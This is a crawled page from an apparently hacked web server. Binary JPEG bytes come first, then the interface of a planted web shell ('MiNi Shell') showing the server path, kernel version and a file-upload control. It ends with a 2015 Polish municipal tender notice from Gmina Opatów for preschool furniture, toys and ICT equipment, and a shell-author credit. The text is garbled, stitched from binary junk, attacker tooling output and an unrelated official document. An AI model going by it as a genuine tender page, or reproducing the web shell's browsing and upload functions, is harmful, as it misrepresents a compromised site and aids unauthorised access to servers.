JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150611/140928-N-2015.html

<p class="kh_header"><b>Opatów: Poprawa warunków funkcjonowania oddziałów  przedszkolnych przy szkołach 
    podstawowych na terenie Gminy Opatów  -  dostawa mebli, zabawek, pomocy 
    dydaktycznych, sprzętu ICT</b><br>
<b>Numer ogłoszenia: 140928 - 2015; data zamieszczenia: 11.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Opatów , Plac Obrońców Pokoju 34, 27-500 Opatów, woj. świętokrzyskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.umopatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa warunków funkcjonowania oddziałów  przedszkolnych przy szkołach 
    podstawowych na terenie Gminy Opatów  -  dostawa mebli, zabawek, pomocy 
    dydaktycznych, sprzętu ICT.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje 
-Poprawę warunków funkcjonowania oddziałów przedszkolnych przy szkołach podstawowych na terenie Gminy Opatów 
- dostawa mebli, zabawek,   pomocy dydaktycznych, sprzętu ICT.
Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzi.
Przedmiot zamówienia podzielono na dwie części.
Część I.
Dostawa mebli, zabawek i pomocy dydaktycznych.
1.Szafka ze schowkiem drewniana - regał wyposażony w 9 półek z drzwiczkami.Stelaż wykonany z płyty wiórowej laminowanej w kolorze brzoza. Moduł posiadający 9 kwadratowych wnęk z 2 półkami każda, w sumie 18 półek. Wnęki przesłonięte  drzwiczkami z możliwością montażu po prawej i lewej stronie, wykonane z płyty MDF w różnych kolorach,   wraz z uchwytami. Tylna ściana  z płyty HDF. Wymiary: szer. 99 cm, gł. 35 cm, wys. 112 cm -3 szt.
2.Biurko nauczyciela drewniane 120x75x76 z trzema szufladami. Stelaż biurka  z płyty wiórowej laminowanej w kolorze buku, tylna ścianka z płyty wiórowej laminowanej w kolorze zielonym, 3 szuflady z płyty wiórowej laminowanej w kolorze buk z frontami z płyty MDF w kolorze zielonym, uchwyty drewniane -1 szt.
3.Krzesło obrotowe tapicerowane.Krzesło winno posiadać obrotowe kółka, podłokietniki oraz regulowane siedzisko oraz oparcie. Wymiary: szer. 63 cm, wys. 115 cm, gł. siedziska 45 cm, szer. siedziska 46 cm, masa ok.16 kg.-1 szt.
4.Wykładzina dywanowa grubość 6mm.Wykładzina poliamidowa do przedszkoli z atestem trudno zapalności-12 m2
5.Tablica pojedyncza zielona 200x100wym.   właściwości magnetyczne-1 szt.
6.Szafka szatniowa typu tęczowa szatnia -szafki na ubranka i buty, w każdej szafce wieszczek i półeczka, jedna szafka składa się z 8 segmentów, stelaż wykonany z płyty wiórowej laminowanej w kolorze brzoza.Szafki przesłonięte  drzwiami z płyty MDF w różnych  kolorach   z ażurowymi aplikacjami w kształcie misiów i motylków, zapewniającymi cyrkulację powietrza. Tylna ściana wykonana z płyty HDF. Wymiary: szer. 130 cm, gł. 35 cm, 172 cm. -3 szt.
7.Duży zestaw klocków drewnianych, elementów złożony z różnorodnych figur geometrycznych oraz małych krążków i cylindrów -3 kpl.
8.Geometryczne kształty z tworzywa-3 kpl.
9.Samochód naczepa - wywrotka z ruchomymi elementami: np .otwierane drzwi; ruchome naczepy; składany trap, ruchoma drabina , wym . 70- 80 cm-5 szt.
10.Samochód wywrotka ,o dużym  gabarycie i wysokiej wytrzymałości. Posiadająca wiele ruchomych elementów 0uatrakcyjniających zabawę. Doskonałe do zabaw w plenerze.  -5 szt.
11.Plansza do zabaw samochodami. Zestaw piankowych puzzli, które po połączeniu tworzą matę z wzorem kolorowego miasta. Doskonałe uzupełnienie zabaw tematycznych oraz edukacyjnych np. nauka zasad ruchu drogowego. Uniwersalne, nieograniczone wzorem brzegi umożliwiające łączenie kilku mat w jeden na zasadzie puzzli.9 sztuk o wym. 30 x 30 cm, grubość pianki 13 mm -1 szt.
12.Plansza dywanowa do zabaw samochodami. Mata podłogowa z motywem uliczek, do zabaw samochodami. Anty poślizgowy spód. wym. 100 x 150 cm-1 szt.
13.Lalka plastikowa, duża  w kolorowym ubranku po naciśnięciu przycisku   śpiewa wesołe piosenki. Wym. ok.50 cm -4 szt.
14.Zestaw narzędzi dla majsterkowiczów, wykonany z wytrzymałego i estetycznego tworzywa sztucznego. Narzędzia lekkie i wygodnie leżące w rączce dziecka. W zestawie  młotek, wkrętak, otwierające się obcęgi oraz wiertarka, która po naciśnięciu przycisku wydaje cichy, ale charakterystyczny dla niej dźwięk. Wiek: 3+ -5 kpl.
15.Torba z instrumentami. Praktyczna torba z licznymi kieszeniami, z trwałej tkaniny, zamykana na zamek. Po otwarciu może być zawieszana.  
Zawartość tamburyn,tamburyn z membraną,5 trójkątów /10-20 cm/,2 drewniane marakasy, duże guiro z tarką, 2 tonbloki 2 tony, tonblok /1 ton/,pudełko akustyczne,
2 kastaniety, kastaniety z rączką, para klawesów, shaker metalowy -2 kpl.
16.Koń na biegunach. Komfort korzystania z bujaka ma  zapewniać: szeroka i stabilna podstawa oraz wysokie i miękkie siedzisko podpierające małego użytkownika -1 szt.
17.Wieloryb na biegunach. Masywny i stabilny, z siedziskiem przeznaczonym dla 1-3 osób /w zależności od wieku dzieci/. Idealny do zabawy w pomieszczeniu lub na zewnątrz-1 szt.
18.Plansza bujak do zabaw ruchowych-3 szt.
19.Skakanka-25 szt.
20.Piłka gimnastyczna śr. 30 cm-5 szt.
21.Lalka mała - dziewczynka, wykonana z tworzywa sztucznego, w komplecie z ubrankiem /sukienką/, przy zmianie pozycji zamyka i otwiera oczy, płacze i mówi mama i tata. Wiek: 3+ -8 szt.
22.Łóżeczko drewniane dla lalek-1 szt.
23.Kącik lekarski. Wózek na kółkach wyposażony w min.16 przedmiotów,niezbędnych w pracy lekarza-3 szt.
24.Kuchenka. Kolorowy zestaw do zabawy w gotowanie i przyrządzanie posiłków . Kuchnia wyposażona w palniki, piekarnik oraz zlewozmywak z kranem, z półkami na przechowywanie akcesoriów kuchennych -1 szt.
25.Pojemnik na zabawki 18 l. plastikowy, kolorowy z pokrywą-3 szt.
26.Kasa z kalkulatorem, kasetką na pieniądze , banknoty i monety -1 szt.
27.Piłka skacząca z uchwytem ok. 45 cm- 6 szt.
28.Ringo kolczaste - sensoryczne kolorowe-6 szt.
29.Tunel typu gąsienica  , wykonany z lekkiej i trwałej tkaniny ortalionowej, wzmocniony elastycznym stelażem. wym. ok. śr.50 cm dł. 185 cm -1 szt.
30.Kolorowe woreczki do zajęć gimnastycznych i rehabilitacyjnych.  Zestaw 8 sztuk w różnych kolorach-3 kpl.
31.Miś pluszowy przytulanka o wym. ok.22 cm- 3 szt.
32.Taca z naczyniami. Serwis kawowy dla najmłodszych , wykonany z tworzywa sztucznego. Skład zestawu :4 filiżanki , 4 talerzyki, 4 łyżeczki,  1 dzbanek , 1 dzbanuszek do śmietanki ,  1 cukiernica , 1 taca - 3 kpl.
33.Samochód straż pożarna,  posiadający ruchome elementy podwozia, podnoszoną i wysuwaną drabinę -1 szt.
34.Samochód betoniarka,  posiadający ruchome elementy podwozia , obrotowa gruszka , zwijany wąż, drabinka, lej oraz szufla -1 szt.
35.Samochód ładowarka-1 szt.
36.Puzle drewniane magiczne -5 kpl.
37.Bajki typu Grajki-1 kpl.
38.Gra Jaś i Małgosia -1 szt.
39.Gra Czerwony Kapturek-1 szt.
40.Książka z ćwiczeniami do j. angielskiego Uczymy się słówek-25 szt.
41.Karty do nauki j. polskiego i j. angielskiego typu zdjęcia-skojarzenia-1 szt.
42.Makatka Mapa Polski -1 szt.
43.Gra typu Flagi państw-2 szt.
44.Gra dla najmłodszych Unia Europejska -1 szt.
45.Plansze przyrodnicze typu Drzewa - cztery sezony -1 kpl.
46.Gra typu Ekologiczny recykling-1 szt.
47.Gra typu sortowanie śmieci-1 szt.
48.Puzle ekologiczne  typu Cztery pory roku-5 kpl.
49.Plansza magnetyczna typu Bawmy się liczbami-1 szt.
50.Guiz typu Wiem wszystk- 1 szt.
51.Brystol kolorowy A3 -15 kpl.
52.Brystol biały A4-15 kpl.
53.Blok rysunkowy kolorowy A4-15 szt.
54.Krepina mix-30 szt.
55.Nożyczki przedszkolne-6 szt.
56.Taśma samoprzylepna-2 szt.
57.Klej w sztyfcie -15 szt.
58.Klej uniwersalny 0,5l -15 szt.
59.Papier pakowy szary A3-10 szt.
60.Markery typu znikające kolory-15 szt.
61.Plastelina-25 opak.
62.Kredki 12 kolorów-30 opak.
63.Tempery 1 l -6 kolorów-5 kpl.
64.Pędzle zestaw mix 12 szt. -10 kpl.
65.Tektura falista mix kolorów -15 kpl.
66.Apteczka z kompletnym wyposażeniem-1 szt.
Część II.
Dostawa sprzętu ICT

1.Zmywarka gastronomiczna z wyparzaniem 4,9 kW-1 szt.
2.Telewizor 42 LED-1 szt.
3.Tablica interaktywna rezystancyjna z dolnym panelem przycisków /dotykowa/-1 szt.
4.Zestaw komputerowy i5 4 GB 500 GB DVCRW W7P i W8.1P 3 Y z  monitorem 21 matrycą IPS FULL HD i krótkim czasem reakcji-1 kpl.
5.Drukarka atramentowa-1 szt.
6.Laptop 15,6 i5-4210H 8GB nVidia GT 840 W8.1-1 szt.
7.Urządzenie wielofunkcyjne-2 szt.
8.Pojektor multimedialny o rozdzielczości 1280x800 pixeli WXGA w formacie 16:10 o jasności 3600 lumenów i kontraście wynoszącym 10000:1-1 szt.
9.Projektor krótkoogniskowy do tablicy multimedialnej 2700 lumenów, lumenów wysokim współczynniku kontrastu 5000:1, w kontrastowej obudowie, do 8000 godzin pracy lampy, filtr o długiej żywotności max. 5000 godzin, cicha praca projektora - 29 dB, funkcja Daylight View - Lite-1 szt.
10.Uchwyt sufitowy do projektora -1 szt.
11.Ekran projekcyjny na statywie-1 kpl.
12.Ekran projekcyjny ścienny manualny o rozm. 200x200-1 szt.
13.Odkurzacz do odkurzania na sucho 1200W-1 szt.

UWAGA!  Wszelkie użyte nazwy handlowe w opisie przedmiotu zamówienia prosimy traktować jako informację uściślającą wiążącą dla wykonawcy. Dopuszcza się dostawy produktów równoważnych co do ich jakości, docelowego przeznaczenia oraz spełnienia funkcji walorów użytkowych. Zamawiający za produkty równoważne uzna takie, które spełniają parametry produktu wskazanego z nazwy handlowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.52.00.00-9, 37.52.41.00-8, 37.52.42.00-9, 39.16.10.00-1, 30.21.33.00-8, 38.65.21.00-1, 39.71.31.00-4, 39.71.34.30-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga udokumentowania posiadania specjalnych uprawnień.
Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga udokumentowania posiadania specjalnych uprawnień.
Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda dokumentów w tym zakresie. Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda dokumentów w tym zakresie. Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda dokumentów w tym zakresie. Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełnioną przez Wykonawcę Stronę tytułową  - załącznik nr 1 do SIWZ. 
Wypełniony przez Wykonawcę Formularz ofertowy - załącznik nr 2 do SIWZ.
 Wypełniony formularz cenowy - załącznik nr 3 do SIWZOświadczenie dotyczące grupy kapitałowej z art.26.ust.2d ustawy - zał. nr 6
Oświadczenie o spełnieniu warunków udziału art.22, ust.1 - załącznik nr 4 do 
         SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w 
   formie  aneksu podpisanego przez obie strony, na  pisemny wniosek jednej ze stron 
  wraz z pisemnym uzasadnieniem konieczności wprowadzenia tych zmian.
Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku 
   do treści oferty na podstawie której dokonano wyboru Wykonawcy jeżeli zmiana 
   umowy   będzie korzystna dla Zamawiającego lub konieczność wprowadzenia tych   
   zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia 
   mowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umopatow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Opatów Plac Obrońców Pokoju 34, 27-500 Opatów- pokój nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2015 godzina 08:50, miejsce: sekretariat- Urzędu Miasta i Gminy Opatów Plac Obrońców pokoju 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu 
Społecznego w ramach Programu Operacyjnego Kapitał Ludzi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com